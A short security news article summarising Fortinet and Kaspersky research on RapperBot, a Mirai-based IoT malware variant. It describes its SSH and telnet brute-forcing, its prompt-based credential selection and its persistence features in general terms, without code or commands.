New Mirai Version Spreads Malware Unconventionally

A new variant of Mirai dubbed RapperBot is a recent instance of malware attempting to propagate via less common or undiscovered attack channels.

RapperBot is a piece of IoT malware that was discovered a year ago and borrows extensively from the Mirai codebase while introducing significant new features.

Compared to other Mirai variants, the new protocol used for C2 connections and the option to brute-force SSH servers instead of Telnet services are two examples of modifications.

Over the course of a year, Fortinet researchers observed the malware's developers making consistent updates, first by adding code to keep infected PCs alive after a reboot and then by adding code for self-propagation via a remote binary downloader.

Eventually, malware developers abandoned the ability to propagate and substituted it with a feature that allowed them to maintain persistent remote access to brute-force SSH servers.

In the fourth quarter of 2022, Kaspersky researchers identified a variant of RapperBot capable of brute-forcing telnet servers as opposed to SSH.

According to Kaspersky's investigation, the malware also possessed an "intelligent" and relatively uncommon brute-force telnet capability.

The virus telnets to a device, evaluates the prompts it receives, and then selects which set of credentials to use in a brute-force attack, as opposed to attempting all of them.

According to Kaspersky, this makes brute-forcing passwords significantly faster than with many other malware programs.

According to Jornt van der Wiel, a senior security researcher at Kaspersky, "when you telnet to a device, you often receive a prompt." It is possible to determine RapperBot's credentials from the information the prompt provides.

He asserts that RapperBot's credentials vary based on the IoT device category being attacked.

Afterwards, malware can download itself onto the target system using a variety of methods, including wget, curl, and ftpget.